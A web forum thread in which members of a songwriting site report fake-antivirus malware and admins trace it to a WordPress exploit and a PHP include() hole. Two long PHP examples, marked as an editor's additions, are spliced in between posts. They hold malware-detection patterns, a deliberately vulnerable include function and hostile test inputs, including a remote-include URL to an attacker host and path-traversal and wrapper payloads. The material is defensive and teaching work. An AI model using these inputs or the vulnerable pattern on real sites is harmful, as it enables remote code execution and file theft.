Bug?

Let us know when something isn't working correctly, or if you find a typo. Do not post complaints or suggestions here.
Spintown
Push Comes to Shove
Posts: 399
Joined: Fri Oct 02, 2009 9:27 pm
Submitting as: Spintown & Company
Pronouns: he/him

Bug?

Post by Spintown »

For a few days I couldn't visit the Song Fight home page without something attacking my computer. Seems to be better now, but it still does it when I try to view the results from the last fight. I don't see anyone else mentioning it in here, so was it just me having problems?
fluffy
Eruption
Posts: 11029
Joined: Sat Sep 25, 2004 10:56 am
Instruments: sometimes
Recording Method: Logic Pro X
Submitting as: Sockpuppet
Pronouns: she/they
Location: Seattle-ish

Re: Bug?

Post by fluffy »

"Without something attacking my computer" is a liiiiiiiiitle bit vague. Could you try posting a screenshot of what's happening, and maybe the page source?
JonPorobil
Beat It
Posts: 5682
Joined: Sat Sep 25, 2004 11:45 am
Instruments: Piano, Guitar, Harmonica, Mandolin, Accordion, Bass, lots of VSTs
Recording Method: Cubase 10.5
Submitting as: Jon Eric, Jon Porobil, others
Pronouns: He/Him
Location: Pittsburgh, PA

Re: Bug?

Post by JonPorobil »

Actually, Spud was just in the IRC room talking about a malware notice he got yesterday. So this is likely a known issue. Still, a little more specificity couldn't hurt.
"Warren Zevon would be proud." -Reve Mosquito

Stages, an album about dealing with loss, anxiety, and grieving a difficult year, now available on Bandcamp and all streaming platforms! https://jonporobil.bandcamp.com/album/stages
Spud
Hot for Teacher
Posts: 4770
Joined: Fri Sep 24, 2004 10:25 am
Instruments: Bass, Keyboards, eHorn
Submitting as: Octothorpe
Location: Seattle

Re: Bug?

Post by Spud »

We believe that the malware issue has been resolved.
"I only listen to good music. And Octothorpe." - Marcus Kellis
Song Fight! The Rockening
bartok2112
A New Player
Posts: 10
Joined: Mon Sep 06, 2010 11:50 am
Instruments: Saxophone, Keyboards
Recording Method: Sonar 8
Submitting as: Cannibal Parrot, Berkeley Social Scene (during the summers)
Location: San Jose, CA

Re: Bug?

Post by bartok2112 »

I just got the malware, fake antivirus thing again at 2:23 pm. It happened when I clicked on the Beaten Man link under last week's fight. I also received it this morning when I voted.

- Paul
Spud
Hot for Teacher
Posts: 4770
Joined: Fri Sep 24, 2004 10:25 am
Instruments: Bass, Keyboards, eHorn
Submitting as: Octothorpe
Location: Seattle

Re: Bug?

Post by Spud »

Sorry, I was under the mistaken impression that JB had done something besides change the passwords. I have cleaned up the code tonight. Please continue to post notices of any further problems.

SPUD
"I only listen to good music. And Octothorpe." - Marcus Kellis
Song Fight! The Rockening
bartok2112
A New Player
Posts: 10
Joined: Mon Sep 06, 2010 11:50 am
Instruments: Saxophone, Keyboards
Recording Method: Sonar 8
Submitting as: Cannibal Parrot, Berkeley Social Scene (during the summers)
Location: San Jose, CA

Re: Bug?

Post by bartok2112 »

Ugh, it just happened again. This time, when I went to the main Songfight.org page.
fluffy
Eruption
Posts: 11029
Joined: Sat Sep 25, 2004 10:56 am
Instruments: sometimes
Recording Method: Logic Pro X
Submitting as: Sockpuppet
Pronouns: she/they
Location: Seattle-ish

Re: Bug?

Post by fluffy »

Spud, it would be really helpful if I could get server access again so that I can diagnose how this exploit apparently keeps happening.
fluffy
Eruption
Posts: 11029
Joined: Sat Sep 25, 2004 10:56 am
Instruments: sometimes
Recording Method: Logic Pro X
Submitting as: Sockpuppet
Pronouns: she/they
Location: Seattle-ish

Re: Bug?

Post by fluffy »

I found a few insidiously well-hidden things that were continuously reinfecting the whole site. They should all be gone now. It also looks like the original exploit was installed via WordPress (songfight.net/blog), which I have now disabled as well. (The server logs indicate that nobody has gained unauthorized login/admin access to the actual hosting account.)

If you're running WordPress, PLEASE PLEASE PLEASE make sure that you're running the latest version of that insecure festering shitpile, because there are some pretty widespread massive exploits going on against it right now. http://blog.sucuri.net/2011/04/mass-inf ... g-com.html has a bit more information.
ken
Hot for Teacher
Posts: 3870
Joined: Sat Sep 25, 2004 6:10 pm
Instruments: Guitar, bass, drums, keys
Recording Method: MOTU 828x, Cubase 10
Submitting as: Ken's Super Duper Band 'n Stuff
Pronouns: he/him
Location: oakland, ca

Re: Bug?

Post by ken »

fluffy wrote: I found a few insidiously well-hidden things that were continuously reinfecting the whole site. They should all be gone now. It also looks like the original exploit was installed via WordPress (songfight.net/blog), which I have now disabled as well. (The server logs indicate that nobody has gained unauthorized login/admin access to the actual hosting account.)
HUZZAH!!!
Ken's Super Duper Band 'n Stuff - Berkeley Social Scene - Tiny Robots - Seamus Collective - Semolina Pilchards - Cutie Pies - Explino! - Bravo Bros. - 2 from 14 - and more!

i would just like to remind everyone that Ken eats kittens - blue lang
Spud
Hot for Teacher
Posts: 4770
Joined: Fri Sep 24, 2004 10:25 am
Instruments: Bass, Keyboards, eHorn
Submitting as: Octothorpe
Location: Seattle

Re: Bug?

Post by Spud »

Do I need to clean up again?
"I only listen to good music. And Octothorpe." - Marcus Kellis
Song Fight! The Rockening
fluffy
Eruption
Posts: 11029
Joined: Sat Sep 25, 2004 10:56 am
Instruments: sometimes
Recording Method: Logic Pro X
Submitting as: Sockpuppet
Pronouns: she/they
Location: Seattle-ish

Re: Bug?

Post by fluffy »

What, did something happen again? I thought I'd cleaned up everything and disabled the obvious points of infection.
Spud
Hot for Teacher
Posts: 4770
Joined: Fri Sep 24, 2004 10:25 am
Instruments: Bass, Keyboards, eHorn
Submitting as: Octothorpe
Location: Seattle

Re: Bug?

Post by Spud »

Yes, pretty much every php file was infected. Linked or not, in use or not. Html was fine. I just cleaned up again. Will continue to monitor.
"I only listen to good music. And Octothorpe." - Marcus Kellis
Song Fight! The Rockening
fluffy
Eruption
Posts: 11029
Joined: Sat Sep 25, 2004 10:56 am
Instruments: sometimes
Recording Method: Logic Pro X
Submitting as: Sockpuppet
Pronouns: she/they
Location: Seattle-ish

Re: Bug?

Post by fluffy »

Fucking hell. Must have been another infection I missed. The malware was VERY good at hiding itself, and I thought I found all the places it was coming up.

What was it infected with?
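Added example (an editor's illustration, not code from the Song Fight! site or from WordPress) for the reinfection problem described in the posts above: a baseline-and-diff check over a PHP tree. Hashing every .php file while the tree is known clean, then diffing against that manifest, catches an injected loader no matter how well it hides, which a grep for known strings does not; the content heuristics only rank what the diff turns up. The temporary tree, the manifest location and the sample injected loader are constructed for the demonstration and do not reproduce the actual payload, which the thread does not show.

```php
<?php
// Added example for this thread; not code from the Song Fight! site or from WordPress.
// The sample tree, the manifest path and the "infected" content are assumptions made here.

/** Map of relative path => sha256 for every .php file under $root, linked or not, in use or not. */
function hash_php_tree(string $root): array
{
    $root = rtrim(realpath($root), DIRECTORY_SEPARATOR);
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    $hashes = [];
    foreach ($iter as $file) {
        if (strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $rel = substr($file->getPathname(), strlen($root) + 1);
        $hashes[$rel] = hash_file('sha256', $file->getPathname());
    }
    ksort($hashes);
    return $hashes;
}

/** Files added, changed or removed since the saved manifest was taken. */
function diff_manifest(array $known, array $now): array
{
    $changed = [];
    foreach (array_intersect_key($now, $known) as $path => $hash) {
        if (!hash_equals($known[$path], $hash)) {
            $changed[] = $path;
        }
    }
    return [
        'added'   => array_keys(array_diff_key($now, $known)),
        'changed' => $changed,
        'removed' => array_keys(array_diff_key($known, $now)),
    ];
}

/** Cheap heuristics for obfuscated loaders; the hash diff, not this list, is the real signal. */
function suspicious_markers(string $code): array
{
    $patterns = [
        'eval-of-decoded-blob'    => '/\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(/i',
        'preg_replace-e-modifier' => '/\bpreg_replace\s*\(\s*[\'"][^\'"]*\/[a-z]*e[a-z]*[\'"]/i',
        'shell-from-request'      => '/\b(?:system|passthru|shell_exec|proc_open|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b/i',
        'long-hex-escaped-string' => '/(?:\\\\x[0-9a-f]{2}){8,}/i',
    ];
    $hits = [];
    foreach ($patterns as $name => $re) {
        if (preg_match($re, $code) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// --- Demonstration on a constructed temporary tree ------------------------------
$root = sys_get_temp_dir() . '/sf-scan-' . bin2hex(random_bytes(4));
mkdir("$root/inc", 0700, true);
file_put_contents("$root/index.php", "<?php echo 'songfight';\n");
file_put_contents("$root/inc/header.php", "<?php echo '<h1>Fight!</h1>';\n");

// Baseline: taken while the tree is known clean and stored OUTSIDE the web tree.
$manifestPath = "$root.manifest.json";
file_put_contents($manifestPath, json_encode(hash_php_tree($root)));

// Simulate the change the thread describes: a loader prepended to an existing file plus a
// dropped file in a directory nothing links to. (Constructed; not the site's real payload.)
$loader = "<?php eval(base64_decode('ZWNobyAnaW5qZWN0ZWQnOw=='));?>";
file_put_contents("$root/inc/header.php", $loader . file_get_contents("$root/inc/header.php"));
file_put_contents("$root/inc/.cache.php", $loader);

$known = json_decode(file_get_contents($manifestPath), true);
$delta = diff_manifest($known, hash_php_tree($root));
foreach (['added', 'changed', 'removed'] as $kind) {
    foreach ($delta[$kind] as $path) {
        $markers = $kind === 'removed' ? [] : suspicious_markers(file_get_contents("$root/$path"));
        printf("%-8s %-20s %s\n", $kind, $path, $markers ? implode(',', $markers) : '-');
    }
}

// Clean up the temporary tree.
$walk = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
    RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($walk as $f) {
    $f->isDir() ? rmdir($f->getPathname()) : unlink($f->getPathname());
}
rmdir($root);
unlink($manifestPath);
```

Regenerate the manifest only after a deploy you have reviewed, and keep it where the web server cannot write; a changed hash on a file nobody deployed is the reinfection signal whatever the file contains, which is what makes this work against a payload that is "very good at hiding itself".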
fluffy
Eruption
Posts: 11029
Joined: Sat Sep 25, 2004 10:56 am
Instruments: sometimes
Recording Method: Logic Pro X
Submitting as: Sockpuppet
Pronouns: she/they
Location: Seattle-ish

Re: Bug?

Post by fluffy »

Found a pretty big security hole in songpage and artistpage which is being actively exploited by people. As always it's one of those things that PHP makes WAY too easy to fuck up on. Will put in a fix ASAP.
Spud
Hot for Teacher
Posts: 4770
Joined: Fri Sep 24, 2004 10:25 am
Instruments: Bass, Keyboards, eHorn
Submitting as: Octothorpe
Location: Seattle

Re: Bug?

Post by Spud »

Fill me in offline, if possible, so that I can learn from this.

Thanks.
"I only listen to good music. And Octothorpe." - Marcus Kellis
Song Fight! The Rockening
fluffy
Eruption
Posts: 11029
Joined: Sat Sep 25, 2004 10:56 am
Instruments: sometimes
Recording Method: Logic Pro X
Submitting as: Sockpuppet
Pronouns: she/they
Location: Seattle-ish

Re: Bug?

Post by fluffy »

Well, the main thing is something everyone should know about: include() and fopen() can both take arbitrary URLs as parameters, unless it's explicitly disabled in php.ini. Stupidest language "feature" EVER. My fix was to abort if it detects a :// in a key parameter.

I've audited all of the site-specific PHP and I think I fixed all the places where that could happen, but of course there's always the possibility of other stuff like that.

PHP really is a shitty language from a writing-secure-apps standpoint. Although I'd like to point out that if Songfight were database-driven rather than file-driven, it would be a lot easier to write code in a more secure way. Direct filesystem access is bad news in PHP.
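Added example (an editor's illustration, not the songpage/artistpage code, which the thread does not show) of the include() hole described in the post above and of two ways to close it. The first check is the one the post describes: refuse any parameter containing "://". The second allowlists the name and then confirms that the realpath() of the resolved file still sits under the page directory. Two caveats worth knowing: include() of a URL only works with allow_url_include=On (Off by default since PHP 5.2), while fopen() and file_get_contents() follow allow_url_fopen, which is On by default, so both belong off in php.ini; and the "://" check on its own still passes "../" traversal and, with allow_url_include on, the data: wrapper, which PHP recognises without the double slash. Directory and parameter names and the sample page file are assumptions made here.

```php
<?php
// Added example for this thread; not code from the Song Fight! site. Directory and
// parameter names, and the sample page file, are assumptions made for the demonstration.

/** The vulnerable shape: the request supplies the name, include() resolves whatever it gets. */
function render_song_vulnerable(string $dir, string $song)
{
    // With allow_url_include=On, $song = "http://attacker.example/x" fetches and runs remote code.
    // Even with it off, "../" walks out of $dir and any local .php file becomes reachable.
    return include $dir . '/' . $song . '.php';
}

/** The fix the post describes: abort when the parameter carries a stream-wrapper scheme. */
function looks_like_url(string $param): bool
{
    return strpos($param, '://') !== false;
}

/** Stricter: allowlist the name, then prove the resolved file still lives under $dir. */
function resolve_page_file(string $dir, string $name): ?string
{
    // Letters, digits, "_" and "-" only: no slashes, dots, colons or NUL bytes get through.
    if (preg_match('/\A[A-Za-z0-9][A-Za-z0-9_-]{0,63}\z/', $name) !== 1) {
        return null;
    }
    $base = realpath($dir);
    $path = realpath($dir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null; // directory missing or no such page
    }
    // realpath() has already collapsed ".." and symlinks, so a plain prefix test is sound here.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_song(string $dir, string $song)
{
    $file = resolve_page_file($dir, $song);
    if ($file === null) {
        return null; // caller turns this into a 404
    }
    return include $file;
}

// --- Demonstration on a constructed page directory -------------------------------
$dir = sys_get_temp_dir() . '/sf-pages-' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
file_put_contents("$dir/beaten-man.php", "<?php return 'song page: Beaten Man';\n");

$inputs = [
    'beaten-man',                                        // the legitimate case
    '../../../../etc/passwd',                            // traversal: no "://", so the scheme check allows it
    'http://attacker.example/shell',                     // classic remote include
    'php://filter/convert.base64-encode/resource=index', // wrapper used for source disclosure
    'data:text/plain;base64,PD9waHAgcGhwaW5mbygpOw==',   // data: wrapper, accepted without "//"
];
foreach ($inputs as $in) {
    printf("%-52s scheme-check: %-6s resolver: %s\n",
        $in,
        looks_like_url($in) ? 'reject' : 'allow',
        resolve_page_file($dir, $in) === null ? 'reject' : 'allow');
}
echo render_song_vulnerable($dir, 'beaten-man'), "\n"; // both work for a normal request...
echo render_song($dir, 'beaten-man'), "\n";            // ...only the resolver refuses the rest

unlink("$dir/beaten-man.php");
rmdir($dir);
```

The allowlist does most of the work; the realpath() prefix test is the belt to its braces and also covers the case where a symlink inside the page directory points elsewhere. For a file-driven site like the one described, keeping the set of includable pages to a fixed directory of fixed-pattern names is what makes the fix auditable in one place rather than in every script.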